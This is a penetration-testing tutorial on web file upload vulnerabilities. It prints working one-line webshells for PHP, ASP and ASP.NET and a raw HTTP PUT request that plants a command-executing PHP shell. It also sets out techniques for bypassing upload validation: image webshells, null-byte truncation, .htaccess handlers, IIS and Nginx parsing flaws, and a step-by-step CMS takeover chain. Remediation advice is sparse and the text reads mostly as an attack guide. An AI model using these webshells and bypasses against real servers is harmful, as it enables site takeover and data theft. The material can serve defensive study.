1 File Upload Vulnerability Overview

File upload functionality is a common feature in virtually all web applications and server-client systems. Users need to upload images for articles and blog posts, profile pictures, or various files to cloud storage services. If servers lack proper filtering mechanisms, allowing webshells, executable files, or malicious scripts to be uploaded, the server can become compromised. Once a malicious script is uploaded to a website, the entire site can be taken over.

These vulnerabilities may result from:

1. Improper server configuration
2. Insufficient filtering and format restrictions in the application code
3. Failure to consider server-specific characteristics

File upload vulnerabilities typically occur when attackers discover website administrative interfaces, which often contain multiple file upload capabilities. Attackers exploit server misconfigurations, application limitations, or web server container vulnerabilities (Apache, Nginx, IIS) to upload small scripts that can download larger payloads or directly upload complete webshells. They may even upload images containing embedded malicious code (image webshells) that can be executed through various methods. Once successfully uploaded and executed, these scripts create backdoors, commonly known as webshells, which provide administrative access to the compromised system.

One defensive strategy involves storing uploaded files on a separate server, ensuring that even if the upload system is compromised, the primary web site remains unaffected.

1.1 Full-Featured Webshells

Complex malicious scripts with their own authentication interfaces.

1.2 Simple Webshells

Typically one-line scripts that can be connected to using specialized tools (like AntSword or WeBaCoo) to gain server control.

<?php @eval($_REQUEST['cmd'])?>

<%eval request['cmd']%> # asp

<%＠ Page Language＝"JScript"%>
<%eval(Request.Item['cmd'],"unsafe");%>
# Asp.Net

2 Exploitation Requirements

1. The web application must have file upload functionality.
2. Web users must have write and execute permissions to the target directory (web applications typically have execute permissions by default).
3. Uploaded files must be executable, whether through image webshell execution or direct script execution.
4. Server configuration must allow HTTP PUT methods for file uploads.

3 Defense Mechanisms and Bypass Techniques

3.1 PUT Method File Upload

An HTTP request method that allows direct file uploads to servers without requiring any script support. Files can be created by crafting HTTP requests directly.

This is a critical vulnerability to test during penetration testing of web applications.

Testing Method

# Connect to the target host's port

telnet 192.168.1.100 80   

# After successful connection, send the request

OPTIONS / HTTP/1.1
Host: 192.168.1.100

# The server will return a list of accepted protocols
GET PUT POST HEAD

# Craft the file creation request
PUT /shell.php HTTP/1.1
Host: 192.168.1.100
Content-Length: 30

<?php system($_GET['command']);?>  # 30 characters

3.2 Frontend Restrictions and Bypass

Frontend validation is ineffective!

Frontend restrictions typically involve JavaScript event validation. While JavaScript offers powerful functionality, its critical weakness is that users can modify or disable JavaScript code in their browsers.

• Open browser developer tools, locate and modify or delete the validation JavaScript before submitting.
• Disable JavaScript in the browser settings.
• Use Burp Suite proxy to intercept requests, modify the file extension to an allowed format, and then restore the original filename in the intercepted request before forwarding.

3.3 MIME Type Validation

The original HTTP protocol did not include data type information, with all data interpreted as HTML documents. To support multimedia data types, HTTP adopted MIME (Multipurpose Internet Mail Extensions) data type information to identify content types.

MIME was initially designed for attaching multimedia data to emails, allowing email clients to handle different types appropriately. When HTTP adopted MIME, its significance expanded, enabling the transmission of diverse content beyond plain text.

Each MIME type consists of two parts: a general category (e.g., audio, image) followed by a specific subtype.

Sometimes servers validate the Content-Type header, which can be bypassed by intercepting the request and modifying the type before forwarding.

3.4 Image Content Validation

Both frontend validation and Content-Type checking are relatively weak and can be bypassed using various techniques to upload scripts to servers.

Therefore, server-side scripts often validate file content, preventing non-image files from being uploaded.

PHP's getimagesize() function checks image dimensions while also validating whether the content matches an image format.

This leads to the concept of image webshells.

While this allows file uploads, the uploaded files may not be executable.

Creating Image Webshells

• Use command line: copy original.jpg/b+malicious.php/a combined.jpg
• Modify image properties and embed PHP code in the copyright field.
• Utilize the fixed 16-byte header of JPEG files, convert it to ASCII, and prepend it to PHP code to bypass getimagesize() validation. This technique is known as "JPEG magic."

3.5 Blacklist/Whitelist Validation

Servers may also validate file extensions, using blacklists to disallow extensions like .php, .asp, or .jsp. However, several alternative executable extensions exist:

PHP variants:
.php .php2 .php3 .php5 .phtml

ASP variants:
.asp .aspx .ascx .ashx .asa .cer

JSP variants:
.jsp .jspx

3.6 Null Byte Truncation

Exploits the NULL character (hex 00, URL-encoded %00). When a file is uploaded, PHP creates a temporary copy in the server's temporary directory, which is deleted when the script ends.

To save the uploaded file, it must be moved to another location. To prevent filename conflicts, a random filename (typically time-based) is generated.

The move_uploaded_file(temp_file, new_location) functon handles this operation. Since many PHP底层 functions are implemented in C, they handle NULL characters as string terminators.

By appending %00 to the save path, such as save_path=../uploads/shell.php%00, the path is truncated at the NULL character.

move_uploaded_file(temp.jpg, ../uploads/shell.php%00/20210814.gif) would result in the file being saved as ../uploads/shell.php instead of the intended path, because the C implementation treats the NULL character as the end of the string. This allows script files to be uploaded regardless of their extension or apparent type.

3.7 .htaccess Manipulation

The .htaccess file (or "distributed configuration file") provides a method for changing configuration settings for a specific directory and all its subdirectories. The commands available to users are limited by the server administrator through Apache's AllowOverride directive.

If websites allow users to upload .htaccess files, significant security risks can arise. In many websites, core directories containing sensitive files (like database classes or plugin directories) use .htaccess to restrict access.

# .htaccess file example
Deny From All

3.7.1 Execute PNG Files as PHP

Upload an image webshell malicious.png, which will be executed as PHP code when accessed.

# .htaccess file
AddType application/x-httpd-php .png 

3.7.2 Files with PHP Keywords in Names

When a filename contains PHP keywords (e.g., image.php.png), the following configuration forces the server to execute it as PHP:

# .htaccess file
AddHandler php5-script php

3.7.3 Matching Specific Filenames

The following configuration executes PHP code only for files matching a specific pattern:

# .htaccess file
<FilesMatch "malicious.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

3.8 Web Server Container Parsing Vulnerabilities

Web servers may have vulnerabilities in how they parse and execute various file types, causing non-script files to be executed as scripts.

3.8.1 Apache (Legacy) File Parsing Vulnerability

Apache servers may parse file extensions from right to left. For example, with info.php.xxx.xx.x, the server would recognize .php and execute the file regardless of the additional unknown extensions.

3.8.2 IIS 6.0 File Parsing Vulnerabilities

• Files with extensions like .asp;1.jpg are executed as ASP scripts instead of being treated as images.
• Files in directories with script-like names, such as 1.asp/image.jpg, are executed as scripts.

3.8.3 IIS 7.0|7.5 + PHP CGI File Parsing Vulnerability (Also affects Nginx)

This vulnerability allows image files to be executed as PHP scripts. In IIS+PHP environments, FastCGI maps file extensions to the PHP executable. By exploiting this mapping, non-PHP files can be processed by the PHP engine.

Exploitation: www.example.com/images/malicious.png/.phpRemediation: Set cgi.fix_pathinfo=0 in the PHP configuration file.

3.8.4 Nginx Parsing Vulnerabilities

1 User Configuration Vulnerability

This vulnerability is unrelated to Nginx or PHP versions and results from improper configuration. Exploitation: www.example.com/images/malicious.png/.php

2 Null Byte Vulnerability

Files with names like info.html%00.php can be executed as PHP if the HTML contains PHP code, with the null byte truncating the extension.

3 Filename Logic Vulnerability (CVE-2013-4547)

Affected versions: Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7 Uploading a file with a trailing space (e.g., 1.gif ) allows execution when accessed with specific encoding: http://your-ip:8080/uploadfiles/1.gif[0x20][0x00].php

Where [0x20] represents a space and [0x00] represents a null byte.

3.9 Rich Text Editors

Rich text editors enable users to format content similarly to word processors, with features like bold text, headings, and image insertion.

3.9.1 eWebEditor

In website administration panels, the article upload section may specify an allowed image format whitelist. Modifying this whitelist to permit script file uploads can create a vulnerability.

3.9.2 CKEditor/FCKEditor

When attempting to upload a script file like malicious.asp, the editor may reject it. If Burp Suite reveals the server is running IIS 6.0, two vulnerabilities can be exploited:

1. The .asp;1.jpg parsing vulnerability
2. The 1.asp/image.jpg directory parsing vulnerability

Attempting to upload malicious.asp;1.jpg may fail due to filtering. The second vulnerability can be exploited by creating a directory named 1.asp (which might be filtered to 1_asp). By intercepting the folder creation request and modifying the path to /2.asp/, a directory structure can be created:

/
	|__2.asp
   		|__subdirectory

After successfully creating the directory, a large image webshell can be uploaded. If direct access doesn't work, a smaller script can be uploaded within the 2.asp directory. After gaining initial access, privileges can be escalated by uploading an elevation utility.

4 Content Management System (CMS) Vulnerabilities

CMS platforms are widely used for small video, news, and reading websites, often using identical templates that may share common vulnerabilities.

4.1 Southern Data Management System (ASP-based)

This ASP-based site uses an Access database (.mdb file) which may be downloadable via direct URL access.

Microsoft Access is a relational database management system that combines the Jet Database Engine with a graphical user interface.

1. Obtain database credentials through SQL injection using UNION SELECT.
2. Discover the administrative panel using a directory scanner.
3. Login to the administrative interface.
4. Locate the database backup section, where both the backup path and filename can be modified.
5. Find an image upload location and upload a .asp webshell, using Burp Suite to change the extension to .jpg for successful upload.
6. Note the uploaded file's path.
7. The backup functionality essentially copies files. Use this to copy the uploaded .jpg file to shell.asp.
8. After successful copying, the .jpg file becomes shell.asp.asa. Accessing the shell.asp path executes the script, as the server treats it as a script file.

Metinfo v5.0.4 (PHP)

Exploits variable overwriting vulnerabilities in the application code, allowing attackers to bypass validtaion checks using variable variables.

This involves crafting a URL with multiple GET parameters that overwrite variables in the application, potentially bypassing file upload validation checks. A custom upload form can then be created to submit to this crafted URL, successfully bypassing restrictions.

<?PHP
foreach($_GET as $key=>$val)
{
	$$key = $val;
	// $_GET['cmd'] ='password';
	// $cmd = 'password';
	// Variable variable usage
	// Transforms GET parameters into PHP variables
}
?>

This approach requires advanced code analysis skills to identify and exploit.